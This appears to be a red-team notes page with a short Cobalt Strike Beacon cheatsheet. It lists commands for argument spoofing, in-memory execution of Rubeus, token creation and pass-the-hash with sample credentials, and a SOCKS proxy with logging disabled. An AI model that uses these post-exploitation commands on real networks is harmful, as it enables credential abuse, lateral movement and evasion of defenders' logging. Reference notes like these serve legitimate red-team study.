> For the complete documentation index, see [llms.txt](https://f1rstbyt3.gitbook.io/hacking-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://f1rstbyt3.gitbook.io/hacking-notes/command-and-control/cobaltstrike/cheatsheet.md).

# Cheatsheet

Beacon control:&#x20;

```
# Sleep 
sleep 0 # make interactive 


# Argue take two commands, make the second look like the first: 
argue whoami /totally-legit
argue powershell -command "get-adcomputer -Filter {...} ..... 
```

Execute Binaries:&#x20;

```
# Net Assembly execute
execute-assembly /root/Rubeus.exe
```

Session Control:&#x20;

```
# make a token for current sessions
make_token darth.vadar deathstar123!

# Pass the Hash
pth darth.vadar 91d85135bb2c4e12c46efbb77612c487
```

Socks:&#x20;

```
socks 65001 SOCKS5 enableNoAuth "" "" disableLogging
```
